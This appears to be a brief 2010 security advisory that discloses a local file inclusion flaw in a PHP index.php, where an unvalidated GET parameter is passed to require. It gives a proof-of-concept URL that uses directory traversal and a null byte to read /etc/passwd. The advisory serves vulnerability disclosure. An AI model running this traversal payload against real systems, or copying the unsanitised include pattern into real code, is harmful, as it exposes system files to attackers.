# Ariko-Security: Security Audits , Audyt bezpieczenstwa
# Advisory: 704/2010

: # Tested on: Linux os :
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
----------------------------------------------------------------------------

[+] file:index.php on line 75
[+] Code:
<?
else {
$module = $_GET['a'];
}

require 'modules/' . $module . '.php';
?>

[+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00